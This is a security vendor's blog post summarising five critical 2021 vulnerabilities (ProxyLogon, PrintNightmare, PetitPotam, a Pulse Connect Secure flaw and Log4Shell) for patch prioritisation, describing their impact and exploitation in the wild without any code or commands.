Vulnerability Round-Up: SOCRadar’s Curation of Critical Vulnerabilities for 2021

Vulnerability management is not a sprint but a marathon. No matter how hard you try, you cannot patch all the vulnerabilities. Prioritization based on the value to the business and exposure to the attacks is critical for performing efficient remediation and mitigation activities.

Threat actors often look for easy targets on internet-facing servers with a higher chance of exploitation and do not care about the severity ranking.

Following is a curated list of critical vulnerabilities reported in 2021, which were on the top of every security professional’s prioritized patch list.

1) ProxyLogon: CVE-2021-26855

ProxyLogon is a pre-authentication proxy vulnerability that allows a remote actor to bypass authentication and receive admin server privileges in Microsoft Exchange Servers.

Combining with a post-authentication vulnerability (CVE-2021-27065) that allows arbitrary file writes to the system (discovered three weeks later), an actor can achieve remote command execution of arbitrary commands through internet-exposed Exchange Servers.

Initial access was gained through uploading a web shell, commonly referred to as a “China Chopper.” It was actively being exploited in the wild by HAFNIUM, a suspected state-sponsored APT group operating out of China. ProxyLogon was found by a researcher working for the Taiwanese security consulting organization DEVCORE.

2) PrintNightmare: CVE-2021-1675 | CVE-2021-34527

Microsoft addressed a local privilege escalation (LPE) vulnerability (CVE-2021-1675) in the Windows Print Spooler service at June’s 2021 Patch Tuesday. A few days later, researchers found that even though the security update guide was deployed, a remote code execution (RCE) vulnerability (CVE-2021-34527) ran in the context of the SYSTEM privileges by exploiting the Spooler service.

An attacker who successfully exploited PrintNightmare could run arbitrary code with SYSTEM privileges and then install programs, view, change, delete data, or create new accounts with full user rights. Microsoft released an uncommon out-of-band patch to address PrintNightmare’s remote code execution (RCE) vulnerability.

Yet, researchers proved that the patch fails to fix PrintNightmare RCE vulnerability in specific scenarios completely. CISA highly recommended that administrators disable the Spooler services in Domain Controllers and other critical systems that do not require print, as suggested by Microsoft’s how-to guide.

3) PetitPotam: CVE-2021-36942

PetitPotam, tracked as CVE-2021-36942, is a vulnerability that can help an attacker take complete control of Windows domains.

PetitPotam abuses the Encrypting File System Remote (MS-EFSRPC) protocol, which is created for performing maintenance and management operations on encrypted data that is kept remotely and accessed over a network. An unauthenticated attacker can use PetitPotam to reach a targeted server to connect to their server and perform NTLM authentication.

PetitPotam can be chained with an exploit targeting Active Directory Certificate Services (AD CS), which provides public key infrastructure (PKI) functionality. PetitPotam was being actively exploited in malicious attacks, including some aimed at deploying a piece of ransomware named LockFile.

4) PulseSecure: CVE-2021-22937

CVE-2021-22937 is an uncontrolled archive extraction vulnerability that allows an authenticated administrator to write arbitrary executable files to the “/home/runtime/tmp/tt/” directory in the Pulse Connect Secure appliance.

It obtained a CVSSv3 score of 9.1. This unrestricted file upload vulnerability is due to a flaw in how archive files are extracted in the administrator web interface. Successful exploitation could result in remote code execution on the underlying Operating System with root privileges. This vulnerability is a patch bypass for CVE-2020-8260, addressed in October 2020, and has been actively targeted by attackers.

5) Log4shell: CVE-2021-44228

Log4Shell is a zero-day arbitrary code execution (ACE) vulnerability in Log4j, a famous Java logging framework. Wonderly, its existence has not been noticed since 2013. On 24 November 2021, the Apache Software Foundation was privately disclosed by Alibaba’s Cloud Security Team and was publicly announced on 9 December 2021.

Apache gave Log4Shell a CVSS severity rating of 10, the highest available score. It is estimated that the widespread exploit affects unnumerable devices. The vulnerability allows requests to arbitrary LDAP and JNDI servers and not check the responses, allows attackers to execute arbitrary Java code on a server or other computer or leak sensitive information.

The Apache Security Team has published a list of its affected software projects. Affected commercial services include Amazon Web Services, Cloudflare, iCloud, Minecraft: Java Edition, Steam, Tencent QQ, and many others.